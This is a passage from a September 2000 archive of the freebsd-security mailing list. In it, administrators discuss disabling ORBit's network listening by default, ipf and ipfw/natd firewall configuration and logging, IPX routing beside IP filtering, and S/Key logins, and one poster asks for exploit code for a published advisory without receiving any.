with ESMTP id 4891F37B42C; Thu, 14 Sep 2000 17:13:31 -0700 (PDT) Received: by gw.nectar.com (Postfix, from userid 1001) id 389111925D; Thu, 14 Sep 2000 19:13:30 -0500 (CDT) Date: Thu, 14 Sep 2000 19:13:30 -0500 From: "Jacques A. Vidrine" To: Ade Lovett Cc: security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914191330.A817@spawn.nectar.com> References: <20000914120949.E73990@FreeBSD.org> <20000914122320.G73990@FreeBSD.org> <20000914165613.J74753@lovett.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20000914165613.J74753@lovett.com>; from ade@FreeBSD.org on Thu, Sep 14, 2000 at 04:56:13PM -0500 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 14, 2000 at 04:56:13PM -0500, Ade Lovett wrote: > Unless I hear to the contrary (ie: someone comes up with a better > solution + patches) by 0900 CDT tomorrow 9/15, I'm going to commit my > original patch, modulo that it will install etc/orbitrc.sample and > use a pkg/MESSAGE suggesting that they move it in place for security > reasons. In that case, why bother with an etc/orbitrc.sample? Just have the appropriate message in pkg/MESSAGE. However, I think that is mostly useless. I'd rather see this: if ![ -f ${PREFIX}/etc/orbitrc ]; then echo "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc fi I want it secured by default. As you say, if a better solution shows up later, so be it. I doubt anyone outside of the GNOME or ORBit development communities has an orbitrc anyway. -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 17:19:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from imapserver1.fnal.gov (imapserver1.fnal.gov [131.225.9.6]) by hub.freebsd.org (Postfix) with ESMTP id 31FE237B424 for ; Thu, 14 Sep 2000 17:19:49 -0700 (PDT) Received: from SMTP ([131.225.9.6]) by imapserver1.fnal.gov (Netscape Messaging Server 3.62) with SMTP id 1095 for ; Thu, 14 Sep 2000 19:19:48 -0500 Received: from nova.fnal.gov ([131.225.18.207]) by 131.225.9.6 (Norton AntiVirus for Internet Email Gateways 1.0) ; Fri, 15 Sep 2000 00:19:47 0000 (GMT) Received: from localhost (tez@localhost) by nova.fnal.gov (8.9.3+Sun/8.9.1) with ESMTP id TAA26891 for ; Thu, 14 Sep 2000 19:19:45 -0500 (CDT) X-Authentication-Warning: nova.fnal.gov: tez owned process doing -bs Date: Thu, 14 Sep 2000 19:19:45 -0500 (CDT) From: Tim Zingelman X-Sender: tez@nova.fnal.gov To: security@FreeBSD.ORG Subject: Re: potential security exposure in GNOME/ORBit? In-Reply-To: <20000914191330.A817@spawn.nectar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > However, I think that is mostly useless. I'd rather see this: > if ![ -f ${PREFIX}/etc/orbitrc ]; then > echo "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc > echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc > fi > I want it secured by default. As you say, if a better solution shows up > later, so be it. > Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org How about: echo "ORBIIOPIPv4=0" >> ${PREFIX}/etc/orbitrc echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc Am I crazy or doesn't >> work just fine even if the file does not exist? - Tim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 17:25:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id C9CB537B43F for ; Thu, 14 Sep 2000 17:25:19 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 4D8861C6F; Thu, 14 Sep 2000 20:25:19 -0400 (EDT) Date: Thu, 14 Sep 2000 20:25:19 -0400 From: Bill Fumerola To: Tim Zingelman Cc: security@FreeBSD.ORG Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914202519.K47559@jade.chc-chimes.com> References: <20000914191330.A817@spawn.nectar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from zingelman@fnal.gov on Thu, Sep 14, 2000 at 07:19:45PM -0500 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 14, 2000 at 07:19:45PM -0500, Tim Zingelman wrote: > How about: > > echo "ORBIIOPIPv4=0" >> ${PREFIX}/etc/orbitrc > echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc > > Am I crazy or doesn't >> work just fine even if the file does not exist? What if it already exists, and ORBIIOPIPv4 is already set to something? That's why we check to see if it doesn't exist already. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 18:21:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F3FD637B423; Thu, 14 Sep 2000 18:21:50 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id SAA51401; Thu, 14 Sep 2000 18:21:50 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 14 Sep 2000 18:21:50 -0700 (PDT) From: Kris Kennaway To: Ade Lovett Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? In-Reply-To: <20000914122320.G73990@FreeBSD.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Sep 2000, Ade Lovett wrote: > The problem here is that it's not the binary itself that is > configured to listen on the network (indeed, the defaults for > ipv4 and ipv6 are 0 in the ORBit code itself). Okay, then I cant think of a better solution. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 19:14:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from whizzo.transsys.com (whizzo.TransSys.COM [144.202.42.10]) by hub.freebsd.org (Postfix) with ESMTP id 10E8F37B42C; Thu, 14 Sep 2000 19:14:54 -0700 (PDT) Received: from whizzo.transsys.com (localhost.transsys.com [127.0.0.1]) by whizzo.transsys.com (8.11.0/8.11.0) with ESMTP id e8F2ErH10738; Thu, 14 Sep 2000 22:14:53 -0400 (EDT) (envelope-from louie@whizzo.transsys.com) Message-Id: <200009150214.e8F2ErH10738@whizzo.transsys.com> X-Mailer: exmh version 2.1.1 10/15/1999 To: Ade Lovett Cc: Kris Kennaway , security@FreeBSD.org X-Image-URL: http://www.transsys.com/louie/images/louie-mail.jpg From: "Louis A. Mamakos" Subject: Re: potential security exposure in GNOME/ORBit? References: <200009140243.e8E2hDG42233@whizzo.transsys.com> <20000914085620.K61662@FreeBSD.org> In-reply-to: Your message of "Thu, 14 Sep 2000 08:56:20 CDT." <20000914085620.K61662@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 14 Sep 2000 22:14:53 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks very much. I've been running with the TCP transport turned off for a couple of days without any problems. Though I suppose I have a rather mundane configuration here.. louie > On Wed, Sep 13, 2000 at 10:05:40PM -0700, Kris Kennaway wrote: > > Unless anyone can think of compelling reasons to have network listening > > enabled, I'd prefer to have it disabled by default. > > I'll kill it off later on this week. Since I have an awful lot of > GNOME applications running on this box (some from ports, some just > waiting to be ported), I should be able to pick up on any other > problems fairly quickly. > > I also have a tentative fix for the locale problem that was highlighted > elsewhere (on -stable I believe). > > > > GNOME scares me :-) > > Me too. Does that scare you any more? :) > > -aDe [Mr FreeBSD GNOME] > > -- > Ade Lovett, Austin, TX. ade@FreeBSD.org > FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 19:15:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 7D09D37B43C for ; Thu, 14 Sep 2000 19:15:49 -0700 (PDT) Received: (qmail 23276 invoked by uid 0); 15 Sep 2000 02:15:48 -0000 Received: from p3ee20a9d.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.157) by mail.gmx.net with SMTP; 15 Sep 2000 02:15:48 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA26687 for freebsd-security@FreeBSD.ORG; Thu, 14 Sep 2000 20:30:48 +0200 Date: Thu, 14 Sep 2000 20:30:48 +0200 From: Gerhard Sittig To: "freebsd-security@FreeBSD.ORG" Subject: Re: ipf logging Message-ID: <20000914203048.I22846@speedy.gsinet> Mail-Followup-To: "freebsd-security@FreeBSD.ORG" References: <39BF49B9.F5EAFC19@allmaui.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from fgleiser@cactus.fi.uba.ar on Wed, Sep 13, 2000 at 02:17:05PM -0300 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Sep 13, 2000 at 14:17 -0300, Fernando Gleiser wrote: > > On Wed, 13 Sep 2000, Craig Cowen wrote: > > > I am not clear on how to log ipf. > > I believe I need to edit my syslog.conf. > > Yes and no. ipmon (ipf's logging process) can log via syslog or > directly to a file. > > If you want to log to a file: > # ipmon & Don't forget to edit in the /etc/newsyslog.conf entry for this case like this one: /var/log/ipflog 600 10 100 * Z /var/run/ipmon.pid > If you want to use syslog: > # ipmon -s & > > and you have to add a line like this to syslog.conf: > local0.* /var/log/ipf.log shameless plug: See http://www.freebsd.org/cgi/query-pr.cgi?pr=20202 for a way to employ ipf in FreeBSD 4 and above. Although the newsyslog.conf thingy is not in there. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 3:16:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id EC75C37B42C for ; Fri, 15 Sep 2000 03:16:08 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13ZsXK-0001bo-00; Fri, 15 Sep 2000 12:16:02 +0200 Date: Fri, 15 Sep 2000 12:16:02 +0200 (IST) From: Roman Shterenzon To: Gerhard Sittig Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: ipf logging In-Reply-To: <20000914203048.I22846@speedy.gsinet> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Sep 2000, Gerhard Sittig wrote: > > and you have to add a line like this to syslog.conf: > > local0.* /var/log/ipf.log > > shameless plug: > > See http://www.freebsd.org/cgi/query-pr.cgi?pr=20202 for a way to > employ ipf in FreeBSD 4 and above. Although the newsyslog.conf > thingy is not in there. I was just looking for such thing couple of days ago. I was almost sure that it's commited in FreeBSD 4.1-STABLE, but I didn't find it. Why isn't that committed yet? I see that the 'last modified' date is 20 Jul. This patch seems be a GoodThing(tm). --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 9:31:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by hub.freebsd.org (Postfix) with ESMTP id 8815637B424 for ; Fri, 15 Sep 2000 09:31:06 -0700 (PDT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id e8FGbg639242 for ; Fri, 15 Sep 2000 11:37:43 -0500 (COT) Date: Fri, 15 Sep 2000 11:37:42 -0500 (COT) From: Buliwyf McGraw To: freebsd-security@FreeBSD.ORG Subject: ipf rules Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi... im working with ipf on FreeBSD. I work with just one network interface and i'm using 2 ip address (the second is an alias). My oficial ip (example): 200.25.53.10 My alias ip : 192.168.40.2 Now, im using this server with nat and proxy to give Internet Access to all my intranet (192.168.0.0). Everything is ok... BUT i can do a telnet to my alias ip 192.168.40.2 from my intranet. It might works??? You could think: the rules are wrong!!! So... here are my rules: ********************************************************************* My ipf.file: pass in from any to 192.168.40.2/32 pass in from 192.168.18.40/2 to any pass out from any to 192.168.40.2/32 pass out from 192.168.18.40/32 to any pass out from 200.25.53.10/32 to any pass in from any to 200.25.53.10/32 ********************************************************************* My ipnat.file: # Redirect everything to squid on port 8080 rdr sis0 0.0.0.0/0 port 80 -> 200.25.53.10 port 8080 tcp rdr sis0 0.0.0.0/0 port 80 -> 200.25.53.10 port 8080 udp # Nat for 192 map sis0 192.168.0.0/16 -> 200.25.53.10/32 portmap tcp/udp 1025:65000 map sis0 192.168.0.0/16 -> 200.25.53.10/32 ********************************************************************* Im using ipmon to see what is going on, and i catch this: 15/09/2000 11:07:16.303473 sis0 @0:1 p 192.168.40.15,38287 -> 192.168.40.2,23 PR tcp len 20 11264 -S IN When i try a telnet from 192.168.40.15: telnet 192.168.40.2 Trying 192.168.40.2... telnet: Unable to connect to remote host: Operation timed out I mean, the request is going to the server... but the answer never comes... so??? Thanks to any help. ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 9:31:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from ocis.ocis.net (ocis.ocis.net [209.52.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 61BC137B423 for ; Fri, 15 Sep 2000 09:31:38 -0700 (PDT) Received: from localhost (vdrifter@localhost) by ocis.ocis.net (8.9.3/8.9.3) with ESMTP id JAA26800 for ; Fri, 15 Sep 2000 09:31:34 -0700 Date: Fri, 15 Sep 2000 09:31:34 -0700 (PDT) From: John F Cuzzola To: freebsd-security@FreeBSD.ORG Subject: icmp + ipfw divert + natd Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Everyone, On my network I have all packets routed through a FreeBSD box and nated even for public computers. For example I have a webserver with ip 10.0.0.1. A public ip of say 100.100.100.1 is given as an alias to the firewall box. Then the following ipfw rules are used: 10 divert 7500 tcp from any to 100.100.100.1 80 20 divert 7500 tcp from 10.0.0.1 80 to any established (port 7500 will have natd listening to do the translation) I do the same as above with all services (smtp,pop3,ftp,dns, etc...). Things seem to be working quite well. My question is with icmp. I have a divert line like: 30 divert 7500 icmp from any to 100.100.100.1 icmptypes 0,3,4,8,11 40 divert 7500 icmp from 10.0.0.1 to any icmptypes ????????? My question is rule 40. Which icmp packets should I natd out? I dont care much for "echo reply" but I don't want to break things like MTU Path Discovery. Any comments would be appreciated. Thank-you To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 12:15:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 9513937B423 for ; Fri, 15 Sep 2000 12:15:49 -0700 (PDT) Received: (qmail 9902 invoked by uid 0); 15 Sep 2000 19:15:45 -0000 Received: from p3ee20a99.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.153) by mail.gmx.net with SMTP; 15 Sep 2000 19:15:45 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA28715 for freebsd-security@FreeBSD.ORG; Fri, 15 Sep 2000 20:35:31 +0200 Date: Fri, 15 Sep 2000 20:35:31 +0200 From: Gerhard Sittig To: "freebsd-security@FreeBSD.ORG" Subject: Re: ipf logging Message-ID: <20000915203531.E27034@speedy.gsinet> Mail-Followup-To: "freebsd-security@FreeBSD.ORG" References: <20000914203048.I22846@speedy.gsinet> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from roman@xpert.com on Fri, Sep 15, 2000 at 12:16:02PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 15, 2000 at 12:16 +0200, Roman Shterenzon wrote: > On Thu, 14 Sep 2000, Gerhard Sittig wrote: > > > > See http://www.freebsd.org/cgi/query-pr.cgi?pr=20202 for a > > way to employ ipf in FreeBSD 4 and above. [ ... ] > > I was just looking for such thing couple of days ago. I was > almost sure that it's commited in FreeBSD 4.1-STABLE, but I > didn't find it. Why isn't that committed yet? ipfilter has made its way into FreeBSD's base system. But it's not plugged in right from the start. The default packet filter is ipfw and the distro's script use this one. Initially I used ipf on FreeBSD only because I've seen OpenBSD before. But I stood with it when I was done reading the IPF HowTo. :) > I see that the 'last modified' date is 20 Jul. > This patch seems be a GoodThing(tm). Yes, but it could have been better right from the start. :) I'm afraid the split into two sequential diffs made it less readable and somewhat unappealing. After all it's my first PR. :> Is it a good idea to followup with a combined patch to bring the normal -STABLE to -STABLE with ipf hooks? Is it a bad idea to close this PR and have it then be replaced (or better worded: handled) by another one? Is something missing to have it applied? IOW: Am I required to add something to make it complete and ready for application? I'm willing to do whatever it takes -- not to have my name on some FreeBSD part but to not collide any longer after updating with my customization against the provided mechanisms. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 15: 1:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from telcom.columbia.k12.mo.us (telcom.columbia.k12.mo.us [198.209.97.194]) by hub.freebsd.org (Postfix) with ESMTP id 2909A37B422; Fri, 15 Sep 2000 15:01:43 -0700 (PDT) Received: (from ishmael@localhost) by telcom.columbia.k12.mo.us (8.9.3/8.9.3) id RAA00359; Fri, 15 Sep 2000 17:01:42 -0500 (CDT) (envelope-from ishmael) Date: Fri, 15 Sep 2000 17:01:42 -0500 From: Jeremy Norris To: security@FreeBSD.ORG Cc: net@FreeBSD.ORG Subject: ip filtering along side ipx Message-ID: <20000915170142.B321@telcomm.columbia.k12.mo.us> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm attempting to implement a firewall in a building on our WAN using ipfilter and 4.1-release. Since we are a Novell shop, it needs to be able to route all the IPX traffic through untouched. I've read through the manpages about IPXrouted, and also read through the info at http://people.freebsd.org/~bp , but I'm not sure how to set it up correctly. Can I ifconfig both ethernet interfaces with the same network number and enable IPXrouted (along with ipxgateway enabled) or is it more complex? Jeremy PS CC all replies to me, I'm not subscribed to the lists. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 16: 5: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id AAD9D37B424; Fri, 15 Sep 2000 16:05:01 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id TAA06616; Fri, 15 Sep 2000 19:04:58 -0400 (EDT) Date: Fri, 15 Sep 2000 19:04:58 -0400 (EDT) From: "Matthew N. Dodd" To: Jeremy Norris Cc: security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: ip filtering along side ipx In-Reply-To: <20000915170142.B321@telcomm.columbia.k12.mo.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 15 Sep 2000, Jeremy Norris wrote: > Can I ifconfig both ethernet interfaces with the same network number > and enable IPXrouted (along with ipxgateway enabled) or is it more > complex? I setup my 2 ethernet interfaces with differnet IPX networks, enabled ipxgateway and IPXrouted and everything works. Granted I've only got a single server and performed only a single test on the remote network, but I don't think you should have any problem. -- | Matthew N. Dodd | '78 Datsun 280Z | '75 Volvo 164E | FreeBSD/NetBSD | | winter@jurai.net | 2 x '84 Volvo 245DL | ix86,sparc,pmax | | http://www.jurai.net/~winter | This Space For Rent | ISO8802.5 4ever | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 16:59: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from alpha.simphost.com (alpha.simphost.com [216.253.163.10]) by hub.freebsd.org (Postfix) with ESMTP id 1E8EB37B424; Fri, 15 Sep 2000 16:59:02 -0700 (PDT) Received: by alpha.simphost.com (Postfix, from userid 1000) id D24D343D0B; Fri, 15 Sep 2000 11:02:42 -0600 (MDT) Received: from localhost (localhost [127.0.0.1]) by alpha.simphost.com (Postfix) with ESMTP id CC8553E006; Fri, 15 Sep 2000 11:02:42 -0600 (MDT) Date: Fri, 15 Sep 2000 11:02:42 -0600 (MDT) From: "Jason L. Schwab" To: freebsd-questions@freebsd.org, freebsd-security@freebsd.org Subject: S/Key (FBSD-3.5-S) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hey ;) I am trying to get S/Key system to work on my FreeBSD 3.5-STABLE machine. I read the manpages for keyinit, sky, key, etc. - and I read the skey.html file on www.freebsd.org., so I have RTFM... I run "keyinit", asks for a new pass phrase, I give it one twice, it generates the key and gives me the ky # and etc. just fine. I telnet to the machine, type in my username it says s/key () ()... and I hit enter to make sure I am typing it tight, and which I am and verified 10 times. No matter what, I get Login Incorrect. I noitced on OpenBSD Systems, (2.6) That you had to run "skey on username" before that user could use skey, even tho I already get the s/key request at the login prompt. Any ideas would be greatful, Thanks! Also, Is there a way in FreeBSD 3.5-S, to make an account only accesable from certain IP Blocks? (or hostnames)? thanks again! - Jason L. Schwab CEO / Unix System Administrator Simple Hosting Solutions www.simphost.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 17:16:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from relay.butya.kz (butya-gw.butya.kz [212.154.129.94]) by hub.freebsd.org (Postfix) with ESMTP id DE26F37B422; Fri, 15 Sep 2000 17:16:05 -0700 (PDT) Received: by relay.butya.kz (Postfix, from userid 1000) id 02AB5287F4; Sat, 16 Sep 2000 07:16:01 +0700 (ALMST) Received: from localhost (localhost [127.0.0.1]) by relay.butya.kz (Postfix) with ESMTP id E85BE287F3; Sat, 16 Sep 2000 07:16:01 +0700 (ALMST) Date: Sat, 16 Sep 2000 07:16:01 +0700 (ALMST) From: Boris Popov To: Jeremy Norris Cc: security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: ip filtering along side ipx In-Reply-To: <20000915170142.B321@telcomm.columbia.k12.mo.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 15 Sep 2000, Jeremy Norris wrote: > I'm attempting to implement a firewall in a building on our WAN using > ipfilter and 4.1-release. Since we are a Novell shop, it needs to be able to > route all the IPX traffic through untouched. I've read through the manpages > about IPXrouted, and also read through the info at > http://people.freebsd.org/~bp , but I'm not sure how to set it up correctly. > Can I ifconfig both ethernet interfaces with the same network number and enable > IPXrouted (along with ipxgateway enabled) or is it more complex? No, each interface should have its own IPX network number just like when you configure NetWare server with multiple ethernet adapaters. IPX traffic are not affected by IP filtering programms. -- Boris Popov http://www.butya.kz/~bp/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 15 20:24:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from atlas.cs.ucla.edu (Atlas.CS.UCLA.EDU [131.179.49.73]) by hub.freebsd.org (Postfix) with ESMTP id A68DA37B42C for ; Fri, 15 Sep 2000 20:24:42 -0700 (PDT) Received: from localhost (yjin@localhost) by atlas.cs.ucla.edu (8.9.3/8.9.3) with ESMTP id UAA00726 for ; Fri, 15 Sep 2000 20:20:34 -0700 (PDT) (envelope-from yjin@cs.ucla.edu) X-Authentication-Warning: atlas.cs.ucla.edu: yjin owned process doing -bs Date: Fri, 15 Sep 2000 20:20:34 -0700 (PDT) From: Jin Yixin To: freebsd-security@FreeBSD.ORG Subject: exploit for FreeBSD-SA-00:23 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Does anyone has the exploit code or sample packets to do "remote denial-of-service in IP stack" described in FreeBSD-SA-00:23? Thanks a lot Yixin Jin UCLA, Computer Science Dept. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 16 3:38:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from nets5.rz.rwth-aachen.de (nets5.rz.RWTH-Aachen.DE [137.226.144.13]) by hub.freebsd.org (Postfix) with ESMTP id BE4A037B424; Sat, 16 Sep 2000 03:38:17 -0700 (PDT) Received: from hyperion.informatik.rwth-aachen.de (hyperion.Informatik.RWTH-Aachen.DE [137.226.112.212]) by nets5.rz.rwth-aachen.de (8.10.1/8.10.1/5) with ESMTP id e8GAcAM28403; Sat, 16 Sep 2000 12:38:10 +0200 (MET DST) Received: from agamemnon.informatik.rwth-aachen.de (agamemnon.Informatik.RWTH-Aachen.DE [137.226.194.74]) by hyperion.informatik.rwth-aachen.de (8.9.1b+Sun/8.9.1/2) with ESMTP id MAA12251; Sat, 16 Sep 2000 12:38:06 +0200 (MET DST) Received: (from stolz@localhost) by agamemnon.informatik.rwth-aachen.de (8.9.1b+Sun/8.9.1-gb-2) id MAA12353; Sat, 16 Sep 2000 12:38:08 +0200 (MET DST) Date: Sat, 16 Sep 2000 12:38:08 +0200 From: Volker Stolz To: "Jason L. Schwab" Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: S/Key (FBSD-3.5-S) Message-ID: <20000916123808.B12326@agamemnon.informatik.rwth-aachen.de> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from jlschwab@simphost.com on Fri, Sep 15, 2000 at 11:02:42AM -0600 Organization: Chair for CS II 1/2 "Dysfunctional Programming" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 15, 2000 at 11:02:42AM -0600, Jason L. Schwab wrote: > I telnet to the machine, type in my username > it says s/key () ()... and I hit enter to > make sure I am typing it tight, and which > I am and verified 10 times. No matter > what, I get Login Incorrect. Your description is too vague for my taste, please elaborate, or, even better, quote an entire sample session. > Also, Is there a way in FreeBSD 3.5-S, to > make an account only accesable from certain > IP Blocks? (or hostnames)? thanks again! E.g. skey_access can do this for you. -- Volker Stolz * stolz@i2.informatik.rwth-aachen.de * PGP + S/MIME To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 16 9:32:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E28ED37B42C for ; Sat, 16 Sep 2000 09:32:39 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id JAA11095 for ; Sat, 16 Sep 2000 09:32:39 -0700 Received: from 